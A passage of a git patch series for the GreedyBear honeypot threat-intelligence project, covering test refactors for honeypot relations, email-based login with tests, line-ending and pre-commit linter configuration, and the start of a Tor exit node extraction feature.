diff --git a/tests/test_ioc_repository.py b/tests/test_ioc_repository.py
index 56ec7b7f..3e69ee9d 100644
--- a/tests/test_ioc_repository.py
+++ b/tests/test_ioc_repository.py
@@ -134,13 +134,13 @@ def test_is_ready_for_extraction_creates_and_enables(self):
         self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
 
     def test_is_ready_for_extraction_case_insensitive(self):
-        GeneralHoneypot.objects.create(name="Cowrie", active=True)
+        GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})
         result = self.repo.is_ready_for_extraction("cowrie")
         self.assertTrue(result)
         self.assertEqual(GeneralHoneypot.objects.filter(name__iexact="cowrie").count(), 1)
 
     def test_get_hp_by_name_insensitive(self):
-        GeneralHoneypot.objects.create(name="Cowrie", active=True)
+        GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})
         result = self.repo.get_hp_by_name("cowrie")
         self.assertIsNotNone(result)
 
@@ -212,8 +212,12 @@ def test_honeypot_unique_constraint_case_insensitive(self):
 
     def test_get_scanners_for_scoring_returns_scanners(self):
         # Create scanners
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True)
-        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, log4j=True)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True)
+        ioc1.general_honeypot.add(cowrie_hp)
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", scanner=True)
+        ioc2.general_honeypot.add(log4pot_hp)
 
         result = self.repo.get_scanners_for_scoring(["recurrence_probability", "expected_interactions"])
 
@@ -222,7 +226,9 @@ def test_get_scanners_for_scoring_returns_scanners(self):
         self.assertIn("5.6.7.8", names)
 
     def test_get_scanners_for_scoring_excludes_non_scanners(self):
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=False)
+        ioc.general_honeypot.add(cowrie_hp)
 
         result = self.repo.get_scanners_for_scoring(["recurrence_probability"])
 
@@ -230,7 +236,9 @@ def test_get_scanners_for_scoring_excludes_non_scanners(self):
         self.assertNotIn("1.2.3.4", names)
 
     def test_get_scanners_for_scoring_only_loads_specified_fields(self):
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, attack_count=100)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, attack_count=100)
+        ioc.general_honeypot.add(cowrie_hp)
 
         result = list(self.repo.get_scanners_for_scoring(["recurrence_probability"]))
 
@@ -268,8 +276,11 @@ def test_get_recent_scanners_returns_recent_only(self):
         recent_date = datetime.now() - timedelta(days=5)
         old_date = datetime.now() - timedelta(days=40)
 
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
-        IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+        ioc1.general_honeypot.add(cowrie_hp)
+        ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, last_seen=old_date)
+        ioc2.general_honeypot.add(cowrie_hp)
 
         cutoff = datetime.now() - timedelta(days=30)
         result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
@@ -280,7 +291,9 @@ def test_get_recent_scanners_returns_recent_only(self):
 
     def test_get_recent_scanners_excludes_non_scanners(self):
         recent_date = datetime.now() - timedelta(days=5)
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, last_seen=recent_date)
+        ioc.general_honeypot.add(cowrie_hp)
 
         cutoff = datetime.now() - timedelta(days=30)
         result = list(self.repo.get_recent_scanners(cutoff))
@@ -371,7 +384,9 @@ def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
 
     def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
         old_date = datetime.now() - timedelta(days=40)
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=old_date)
+        ioc.general_honeypot.add(cowrie_hp)
 
         cutoff = datetime.now() - timedelta(days=30)
         result = list(self.repo.get_recent_scanners(cutoff))
@@ -420,8 +435,12 @@ def test_update_scores_with_repository(self):
         from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
 
         # Create test data
-        IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
-        IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+        ioc1 = IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, recurrence_probability=0.0)
+        ioc1.general_honeypot.add(cowrie_hp)
+        ioc2 = IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, recurrence_probability=0.0)
+        ioc2.general_honeypot.add(log4pot_hp)
 
         # Create score dataframe
         df = pd.DataFrame(
@@ -450,8 +469,12 @@ def test_update_scores_resets_missing_iocs(self):
         from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
 
         # Create test data - one IOC will be missing from df
-        IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
-        IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+        ioc1 = IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, recurrence_probability=0.9)
+        ioc1.general_honeypot.add(cowrie_hp)
+        ioc2 = IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, recurrence_probability=0.8)
+        ioc2.general_honeypot.add(log4pot_hp)
 
         # DataFrame only has one IOC
         df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
@@ -470,7 +493,9 @@ def test_get_current_data_with_repository(self):
         from greedybear.cronjobs.scoring.utils import get_current_data
 
         recent_date = datetime.now() - timedelta(days=5)
-        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+        cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+        ioc.general_honeypot.add(cowrie_hp)
 
         result = get_current_data(days_lookback=30, ioc_repo=self.repo)
 
diff --git a/tests/test_models.py b/tests/test_models.py
index 67cabb9b..89d7124d 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -13,8 +13,9 @@ def test_ioc_model(self):
         self.assertEqual(self.ioc.number_of_days_seen, 1)
         self.assertEqual(self.ioc.attack_count, 1)
         self.assertEqual(self.ioc.interaction_count, 1)
-        self.assertEqual(self.ioc.log4j, True)
-        self.assertEqual(self.ioc.cowrie, True)
+        # Honeypots are now via M2M relationship
+        self.assertIn(self.cowrie_hp, self.ioc.general_honeypot.all())
+        self.assertIn(self.log4pot_hp, self.ioc.general_honeypot.all())
         self.assertEqual(self.ioc.scanner, True)
         self.assertEqual(self.ioc.payload_request, True)
         self.assertEqual(self.ioc.related_urls, [])
diff --git a/tests/test_scoring_utils.py b/tests/test_scoring_utils.py
index aed4752b..815b534b 100644
--- a/tests/test_scoring_utils.py
+++ b/tests/test_scoring_utils.py
@@ -100,7 +100,7 @@ def test_feature_extraction(self):
             self.assertEqual(str(feature["days_seen"][0]), today)
             self.assertEqual(feature["asn"], "12345")
             self.assertTrue(len(feature["honeypots"]) > 0)
-            self.assertTrue(set(feature["honeypots"]).issubset({"heralding", "ciscoasa", "log4j", "cowrie"}))
+            self.assertTrue(set(feature["honeypots"]).issubset({"heralding", "ciscoasa", "log4pot", "cowrie"}))
             self.assertEqual(feature["honeypot_count"], len(feature["honeypots"]))
             self.assertEqual(feature["destination_port_count"], 3)
             self.assertEqual(feature["days_seen_count"], 1)
@@ -124,7 +124,7 @@ def test_multi_label_encode_ioc(self):
         features = get_features(data, today)
         features = multi_label_encode(features, "honeypots").to_dict("records")
         features.sort(key=lambda d: d["value"], reverse=True)
-        for h in ["heralding", "ciscoasa", "log4j", "cowrie"]:
+        for h in ["heralding", "ciscoasa", "log4pot", "cowrie"]:
             self.assertEqual(features[1][f"has_{h}"], 1)
 
     def test_multi_label_encode_sample(self):
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index e7861e25..e537b882 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -19,7 +19,7 @@ def setUpTestData(cls):
 
     def test_valid_fields(self):
         choices = {
-            "feed_type": ["all", "log4j", "cowrie", "adbhoney"],
+            "feed_type": ["all", "log4pot", "cowrie", "adbhoney"],
             "attack_type": ["all", "scanner", "payload_request"],
             "ioc_type": ["ip", "domain", "all"],
             "max_age": [str(n) for n in [1, 2, 4, 8, 16]],
@@ -53,7 +53,7 @@ def test_valid_fields(self):
             self.assertEqual(valid, True)
 
     def test_invalid_fields(self):
-        valid_feed_types = frozenset(["all", "log4j", "cowrie", "adbhoney"])
+        valid_feed_types = frozenset(["all", "log4pot", "cowrie", "adbhoney"])
         data_ = {
             "feed_type": "invalid_feed_type",
             "attack_type": "invalid_attack_type",
@@ -98,7 +98,7 @@ def setUpTestData(cls):
     def test_valid_fields(self):
         scanner_choices = [True, False]
         payload_request_choices = [True, False]
-        feed_type_choices = ["all", "log4j", "cowrie", "adbhoney"]
+        feed_type_choices = ["all", "log4pot", "cowrie", "adbhoney"]
 
         # generete all possible valid input data using cartesian product
         valid_data_choices = product(scanner_choices, payload_request_choices, feed_type_choices)
@@ -129,7 +129,7 @@ def test_valid_fields(self):
             self.assertEqual(valid, True)
 
     def test_invalid_fields(self):
-        valid_feed_types = frozenset(["all", "log4j", "cowrie", "adbhoney"])
+        valid_feed_types = frozenset(["all", "log4pot", "cowrie", "adbhoney"])
         data_ = {
             "feed_type": "invalid_feed_type",
             "value": True,
diff --git a/tests/test_views.py b/tests/test_views.py
index 3b20b4e6..fe869d60 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -42,10 +42,12 @@ def test_for_vaild_registered_ip(self):
         )
         self.assertEqual(response.json()["ioc"]["number_of_days_seen"], self.ioc.number_of_days_seen)
         self.assertEqual(response.json()["ioc"]["attack_count"], self.ioc.attack_count)
-        self.assertEqual(response.json()["ioc"]["log4j"], self.ioc.log4j)
-        self.assertEqual(response.json()["ioc"]["cowrie"], self.ioc.cowrie)
-        self.assertEqual(response.json()["ioc"]["general_honeypot"][0], self.heralding.name)  # FEEDS
-        self.assertEqual(response.json()["ioc"]["general_honeypot"][1], self.ciscoasa.name)  # FEEDS
+        # Honeypots are now via M2M relationship (serialized as list of strings)
+        honeypot_names = response.json()["ioc"]["general_honeypot"]
+        self.assertIn(self.heralding.name, honeypot_names)
+        self.assertIn(self.ciscoasa.name, honeypot_names)
+        self.assertIn(self.cowrie_hp.name, honeypot_names)
+        self.assertIn(self.log4pot_hp.name, honeypot_names)
         self.assertEqual(response.json()["ioc"]["scanner"], self.ioc.scanner)
         self.assertEqual(response.json()["ioc"]["payload_request"], self.ioc.payload_request)
         self.assertEqual(
@@ -65,8 +67,8 @@ def test_for_invalid_authentication(self):
 
 
 class FeedsViewTestCase(CustomTestCase):
-    def test_200_log4j_feeds(self):
-        response = self.client.get("/api/feeds/log4j/all/recent.json")
+    def test_200_log4pot_feeds(self):
+        response = self.client.get("/api/feeds/log4pot/all/recent.json")
         self.assertEqual(response.status_code, 200)
         if settings.FEEDS_LICENSE:
             self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
@@ -77,7 +79,11 @@ def test_200_log4j_feeds(self):
         target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
         self.assertIsNotNone(target_ioc)
 
-        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        # feed_type now derived from general_honeypot M2M
+        self.assertIn("log4pot", target_ioc["feed_type"])
+        self.assertIn("cowrie", target_ioc["feed_type"])
+        self.assertIn("heralding", target_ioc["feed_type"])
+        self.assertIn("ciscoasa", target_ioc["feed_type"])
         self.assertEqual(target_ioc["attack_count"], 1)
         self.assertEqual(target_ioc["scanner"], True)
         self.assertEqual(target_ioc["payload_request"], True)
@@ -111,7 +117,7 @@ def test_200_general_feeds(self):
         target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
         self.assertIsNotNone(target_ioc)
 
-        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        self.assertEqual(set(target_ioc["feed_type"]), {"log4pot", "cowrie", "heralding", "ciscoasa"})
         self.assertEqual(target_ioc["attack_count"], 1)
         self.assertEqual(target_ioc["scanner"], True)
         self.assertEqual(target_ioc["payload_request"], True)
@@ -206,7 +212,7 @@ def test_200_all_feeds(self):
         target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
         self.assertIsNotNone(target_ioc)
 
-        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        self.assertEqual(set(target_ioc["feed_type"]), {"log4pot", "cowrie", "heralding", "ciscoasa"})
         self.assertEqual(target_ioc["attack_count"], 1)
         self.assertEqual(target_ioc["scanner"], True)
         self.assertEqual(target_ioc["payload_request"], True)
@@ -225,7 +231,7 @@ def test_200_general_feeds(self):
         target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
         self.assertIsNotNone(target_ioc)
 
-        self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+        self.assertEqual(set(target_ioc["feed_type"]), {"log4pot", "cowrie", "heralding", "ciscoasa"})
         self.assertEqual(target_ioc["attack_count"], 1)
         self.assertEqual(target_ioc["scanner"], True)
         self.assertEqual(target_ioc["payload_request"], True)
@@ -299,17 +305,18 @@ def test_200_enrichment_requests(self):
         self.assertEqual(response.json()[0]["Requests"], 1)
 
     def test_200_feed_types(self):
-        self.assertEqual(GeneralHoneypot.objects.count(), 3)
+        # Count honeypots before adding new one
+        initial_count = GeneralHoneypot.objects.count()
         # add a general honeypot without associated ioc
         GeneralHoneypot(name="Tanner", active=True).save()
-        self.assertEqual(GeneralHoneypot.objects.count(), 4)
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
 
         response = self.client.get("/api/statistics/feeds_types")
         self.assertEqual(response.status_code, 200)
         # Expecting 3 because setupTestData creates 3 IOCs (ioc, ioc_2, ioc_domain) associated with Heralding
         self.assertEqual(response.json()[0]["Heralding"], 3)
         self.assertEqual(response.json()[0]["Ciscoasa"], 2)
-        self.assertEqual(response.json()[0]["Log4j"], 3)
+        self.assertEqual(response.json()[0]["Log4pot"], 3)
         self.assertEqual(response.json()[0]["Cowrie"], 3)
         self.assertEqual(response.json()[0]["Tanner"], 0)
 

From 33a27542c619291d8d4459fba5c2928c6c7ebddd Mon Sep 17 00:00:00 2001
From: M4N45W1 <manaswirane1947@gmail.com>
Date: Fri, 23 Jan 2026 19:58:03 +0530
Subject: [PATCH 59/75] Feature: auth using mail. Closes #528 (#723)

---
 authentication/serializers.py               |  14 ++-
 tests/authentication/test_auth_via_email.py | 100 ++++++++++++++++++++
 2 files changed, 112 insertions(+), 2 deletions(-)
 create mode 100644 tests/authentication/test_auth_via_email.py

diff --git a/authentication/serializers.py b/authentication/serializers.py
index 960a7bab..df86986f 100644
--- a/authentication/serializers.py
+++ b/authentication/serializers.py
@@ -10,6 +10,7 @@
 from django.conf import settings
 from django.core.exceptions import ValidationError
 from django.db import DatabaseError, transaction
+from django.db.models import Q
 from rest_framework import serializers as rfs
 from rest_framework.authtoken.serializers import AuthTokenSerializer
 from slack_sdk.errors import SlackApiError
@@ -140,11 +141,21 @@ def save(self):
 
 class LoginSerializer(AuthTokenSerializer):
     def validate(self, attrs):
+        login_value = attrs.get("username")
+        # If user has entered email we try email->username mapping
+        try:
+            user = User.objects.get(email__iexact=login_value)
+            attrs["username"] = user.username
+        except User.DoesNotExist:
+            # Either user has entered username, or email entered doesn't exist
+            pass
+
         try:
             return super().validate(attrs)
         except rfs.ValidationError as exc:
             try:
-                user = User.objects.get(username=attrs["username"])
+                # Check if either of the two, username or email exists
+                user = User.objects.get(Q(username=login_value) | Q(email__iexact=login_value))
             except User.DoesNotExist:
                 # we do not want to leak info
                 # so just raise the original exception without context
@@ -159,5 +170,4 @@ def validate(self, attrs):
                     elif user.approved is False:
                         exc.detail = "Your account was declined."
                     logger.info(f"User {user} is not active. Error message: {exc.detail}")
-            # else
             raise exc from None
diff --git a/tests/authentication/test_auth_via_email.py b/tests/authentication/test_auth_via_email.py
new file mode 100644
index 00000000..f63f6469
--- /dev/null
+++ b/tests/authentication/test_auth_via_email.py
@@ -0,0 +1,100 @@
+from django.contrib.auth import get_user_model
+from django.core import mail
+from django.core.cache import cache
+from django.test import tag
+from durin.models import AuthToken, Client
+from rest_framework.reverse import reverse
+
+from . import CustomOAuthTestCase
+
+User = get_user_model()
+login_uri = reverse("auth_login")
+logout_uri = reverse("auth_logout")
+register_uri = reverse("auth_register")
+verify_email_uri = reverse("auth_verify-email")
+
+
+@tag("api", "user")
+class TestUserAuth(CustomOAuthTestCase):
+    def __register_user(self, body: dict):
+        response = self.client.post(register_uri, {**body}, format="json")
+        content = response.json()
+        msg = (response, content)
+
+        # response assertions
+        self.assertEqual(201, response.status_code, msg=msg)
+        self.assertEqual(content["username"], body["username"], msg=msg)
+        self.assertEqual(content["email"], body["email"], msg=msg)
+        self.assertFalse(content["is_active"], msg="newly registered user must have is_active=False")
+
+    def setUp(self):
+        # test data
+        self.testregisteruser = {
+            "email": "testregisteruser@test.com",
+            "username": "testregisteruser",
+            "first_name": "testregisteruser",
+            "last_name": "testregisteruser",
+            "password": "testregisteruser",
+            "profile": {
+                "company_name": "companytest",
+                "company_role": "greedybear test",
+                "twitter_handle": "@fake",
+                "discover_from": "other",
+            },
+        }
+        mail.outbox = []
+        self.__register_user(body=self.testregisteruser)
+        self.user = User.objects.get(username=self.testregisteruser["username"])
+
+    def tearDown(self):  # skipcq: PYL-R0201
+        # cache clear (for throttling)
+        cache.clear()
+        # db clean
+        AuthToken.objects.all().delete()
+        Client.objects.all().delete()
+
+    def verify_user(self):
+        # Verify user and mail
+        email = self.user.email_addresses.first()
+        email.is_verified = True
+        self.user.is_active = True
+        self.user.save()
+        email.save()
+
+    def test_login_via_mail(self):
+        # Using email for login
+        self.verify_user()
+        password = self.testregisteruser["password"]
+        body = {"username": self.user.email, "password": password}
+        response = self.client.post(login_uri, body)
+        cookies_data = response.cookies
+        msg = (response, cookies_data)
+        self.assertEqual(response.status_code, 200, msg=msg)
+        self.assertIn("CERTEGO_SAAS_AUTH_TOKEN", cookies_data, msg=msg)
+
+        self.assertEqual(AuthToken.objects.count(), 1)
+
+    def test_unverified_login_via_email(self):
+        # User unverified should fail
+        password = self.testregisteruser["password"]
+        body = {"username": self.user.email, "password": password}
+        response = self.client.post(login_uri, body)
+        cookies_data = response.cookies
+        msg = (response, cookies_data)
+        self.assertEqual(response.status_code, 400, msg=msg)
+        self.assertNotIn("CERTEGO_SAAS_AUTH_TOKEN", cookies_data, msg=msg)
+
+        self.assertEqual(AuthToken.objects.count(), 0)
+
+    def test_login_via_username(self):
+        # Testing login via username
+        self.verify_user()
+        password = self.testregisteruser["password"]
+        body = {"username": self.user.username, "password": password}
+        response = self.client.post(login_uri, body)
+        cookies_data = response.cookies
+        msg = (response, cookies_data)
+        self.assertEqual(response.status_code, 200, msg=msg)
+        self.assertIn("CERTEGO_SAAS_AUTH_TOKEN", cookies_data, msg=msg)
+
+        self.assertEqual(AuthToken.objects.count(), 1)

From 2dff54633f37f79d2f7d79b216ab04ede52cc865 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Mon, 26 Jan 2026 14:27:55 +0530
Subject: [PATCH 60/75] Standardize line endings and integrate frontend
 linters. Closes #729, Closes #727 (#730)

* fix: standardize line endings and integrate frontend linters into pre-commit

Fixes #729: Fix inconsistent line endings causing CI failures on Windows
- Update Ruff config to enforce LF line endings (line-ending = 'lf')
- Add .gitattributes to normalize line endings via Git

Fixes #727: Integrate Frontend Linters into Pre-commit Workflow
- Add Prettier hook using local npm script (npm run formatter)
- Add ESLint hook using local npm script (npm run lint)
- Uses same linter versions as CI to ensure consistency

* feat: skip frontend hooks if node_modules not installed

Frontend pre-commit hooks (prettier, eslint) now gracefully skip if
frontend/node_modules doesn't exist. This allows backend-only contributors
to use pre-commit without needing to run npm install in frontend/.
---
 .gitattributes                                | 67 +++++++++++++++++++
 .github/.pre-commit-config.yaml               | 23 +++++++
 .../configurations/python_linters/.ruff.toml  |  2 +-
 3 files changed, 91 insertions(+), 1 deletion(-)
 create mode 100644 .gitattributes

diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 00000000..26310858
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,67 @@
+# =============================================================================
+# Git Attributes Configuration for GreedyBear
+# Ensures consistent line endings across all platforms
+# =============================================================================
+
+# Default behavior: Auto-detect text files and normalize to LF
+* text=auto eol=lf
+
+# -----------------------------------------------------------------------------
+# Text files (normalize to LF)
+# -----------------------------------------------------------------------------
+
+# Python
+*.py text eol=lf
+
+# JavaScript/React
+*.js text eol=lf
+*.jsx text eol=lf
+*.mjs text eol=lf
+*.cjs text eol=lf
+
+# Styles
+*.css text eol=lf
+*.scss text eol=lf
+
+# Web
+*.html text eol=lf
+
+# Config files
+*.json text eol=lf
+*.yml text eol=lf
+*.yaml text eol=lf
+*.toml text eol=lf
+*.conf text eol=lf
+
+# Documentation
+*.md text eol=lf
+*.txt text eol=lf
+
+# Shell scripts
+*.sh text eol=lf
+
+# Docker
+Dockerfile text eol=lf
+Dockerfile_nginx text eol=lf
+
+# Git
+.gitignore text eol=lf
+.gitattributes text eol=lf
+
+# -----------------------------------------------------------------------------
+# Binary files (do not normalize)
+# -----------------------------------------------------------------------------
+
+# Images
+*.png binary
+*.ico binary
+
+# -----------------------------------------------------------------------------
+# Linguist overrides (GitHub language statistics)
+# -----------------------------------------------------------------------------
+
+# Exclude from language statistics
+*.min.js linguist-vendored
+*.min.css linguist-vendored
+**/migrations/* linguist-generated
+package-lock.json linguist-generated
diff --git a/.github/.pre-commit-config.yaml b/.github/.pre-commit-config.yaml
index 8da56aab..08c9b4c2 100644
--- a/.github/.pre-commit-config.yaml
+++ b/.github/.pre-commit-config.yaml
@@ -1,4 +1,5 @@
 repos:
+# Python linting with Ruff
 -   repo: https://github.com/astral-sh/ruff-pre-commit
     rev: v0.12.7
     hooks:
@@ -7,3 +8,25 @@ repos:
         args: ["--fix", "--config", "./.github/configurations/python_linters/.ruff.toml"]
       - id: ruff-format
         args: ["--config", "./.github/configurations/python_linters/.ruff.toml"]
+
+# Frontend formatting with Prettier (using local npm)
+# Skips if frontend/node_modules doesn't exist (for backend-only contributors)
+-   repo: local
+    hooks:
+      - id: prettier
+        name: prettier
+        entry: bash -c 'if [ -d frontend/node_modules ]; then cd frontend && npm run formatter; else echo "Skipping prettier - run npm install in frontend/ to enable"; fi'
+        language: system
+        files: ^frontend/src/.*\.(js|jsx)$|^frontend/tests/.*\.(js|jsx)$|^frontend/src/styles/.*\.(css|scss)$
+        pass_filenames: false
+
+# Frontend linting with ESLint (using local npm)
+# Skips if frontend/node_modules doesn't exist (for backend-only contributors)
+-   repo: local
+    hooks:
+      - id: eslint
+        name: eslint
+        entry: bash -c 'if [ -d frontend/node_modules ]; then cd frontend && npm run lint; else echo "Skipping eslint - run npm install in frontend/ to enable"; fi'
+        language: system
+        files: ^frontend/src/.*\.(js|jsx)$|^frontend/tests/.*\.(js|jsx)$
+        pass_filenames: false
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index 12daab7d..3d61ba06 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -30,7 +30,7 @@ docstring-code-format = true
 
 indent-style = "space"
 
-line-ending = "native"
+line-ending = "lf"
 
 quote-style = "double"
 

From 4b5ec0236051ec7842900715801709928f12a36e Mon Sep 17 00:00:00 2001
From: Sumit Das <codebysumitdev@gmail.com>
Date: Mon, 26 Jan 2026 17:14:51 +0530
Subject: [PATCH 61/75] =?UTF-8?q?feat:=20Add=20Tor=20exit=20node=20extract?=
 =?UTF-8?q?ion=20with=20separate=20TorExitNode=20model=20(#=E2=80=A6=20(#7?=
 =?UTF-8?q?28)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat: Add Tor exit node extraction with separate TorExitNode model (#547)

* fix: use CustomTestCase and add task scheduling

Thanks for the review! Made both changes:
- Switched to CustomTestCase for test consistency
- Added weekly Celery Beat schedule (Sundays at 4:30 AM)

Addresses feedback from @regulartim

* fix: address review feedback for tor exit node feature

- Added migration file for TorExitNode model (0032)
- Fixed case sensitivity issue - changed 'Tor Exit Node' to lowercase for API filtering
- Registered TorExitNode in admin panel for easy management

---------

Co-authored-by: SUMIT DAS <sumitdas@SUMITs-MacBook-Air.local>
---
 greedybear/admin.py                          |  8 ++
 greedybear/celery.py                         |  5 +
 greedybear/cronjobs/repositories/__init__.py |  1 +
 greedybear/cronjobs/repositories/tor.py      | 24 +++++
 greedybear/cronjobs/tor_exit_nodes.py        | 55 +++++++++++
 greedybear/migrations/0032_torexitnode.py    | 35 +++++++
 greedybear/models.py                         | 14 +++
 greedybear/tasks.py                          |  7 ++
 tests/test_tor.py                            | 97 ++++++++++++++++++++
 9 files changed, 246 insertions(+)
 create mode 100644 greedybear/cronjobs/repositories/tor.py
 create mode 100644 greedybear/cronjobs/tor_exit_nodes.py
 create mode 100644 greedybear/migrations/0032_torexitnode.py
 create mode 100644 tests/test_tor.py

diff --git a/greedybear/admin.py b/greedybear/admin.py
index 830e34c6..b3752bf1 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -15,12 +15,20 @@
     MassScanner,
     Sensor,
     Statistics,
+    TorExitNode,
     WhatsMyIPDomain,
 )
 
 logger = logging.getLogger(__name__)
 
 
+@admin.register(TorExitNode)
+class TorExitNodeModelAdmin(admin.ModelAdmin):
+    list_display = ["ip_address", "added", "reason"]
+    search_fields = ["ip_address"]
+    search_help_text = ["search for the IP address"]
+
+
 @admin.register(Sensor)
 class SensorsModelAdmin(admin.ModelAdmin):
     list_display = [field.name for field in Sensor._meta.get_fields()]
diff --git a/greedybear/celery.py b/greedybear/celery.py
index e3d79c4e..db1500e2 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -117,4 +117,9 @@ def setup_loggers(*args, **kwargs):
         "schedule": crontab(hour=4, minute=15, day_of_week=0),
         "options": {"queue": "default"},
     },
+    "get_tor_exit_nodes": {
+        "task": "greedybear.tasks.get_tor_exit_nodes",
+        "schedule": crontab(hour=4, minute=30, day_of_week=0),
+        "options": {"queue": "default"},
+    },
 }
diff --git a/greedybear/cronjobs/repositories/__init__.py b/greedybear/cronjobs/repositories/__init__.py
index 30133430..84df974e 100644
--- a/greedybear/cronjobs/repositories/__init__.py
+++ b/greedybear/cronjobs/repositories/__init__.py
@@ -4,3 +4,4 @@
 from greedybear.cronjobs.repositories.ioc import *
 from greedybear.cronjobs.repositories.mass_scanner import *
 from greedybear.cronjobs.repositories.sensor import *
+from greedybear.cronjobs.repositories.tor import *
diff --git a/greedybear/cronjobs/repositories/tor.py b/greedybear/cronjobs/repositories/tor.py
new file mode 100644
index 00000000..0e2a6bf7
--- /dev/null
+++ b/greedybear/cronjobs/repositories/tor.py
@@ -0,0 +1,24 @@
+import logging
+
+from greedybear.models import TorExitNode
+
+
+class TorRepository:
+    """Repository for data access to Tor exit node entries."""
+
+    def __init__(self):
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+
+    def get_or_create(self, ip_address: str, reason: str = "tor exit node") -> tuple[TorExitNode, bool]:
+        """
+        Get an existing Tor exit node entry or create a new one.
+
+        Args:
+            ip_address: IP address of the Tor exit node.
+            reason: Reason/description (default: "tor exit node").
+
+        Returns:
+            Tuple of (TorExitNode object, created_flag) where created_flag is True if new.
+        """
+        node, created = TorExitNode.objects.get_or_create(ip_address=ip_address, defaults={"reason": reason})
+        return node, created
diff --git a/greedybear/cronjobs/tor_exit_nodes.py b/greedybear/cronjobs/tor_exit_nodes.py
new file mode 100644
index 00000000..b4d0609b
--- /dev/null
+++ b/greedybear/cronjobs/tor_exit_nodes.py
@@ -0,0 +1,55 @@
+import re
+
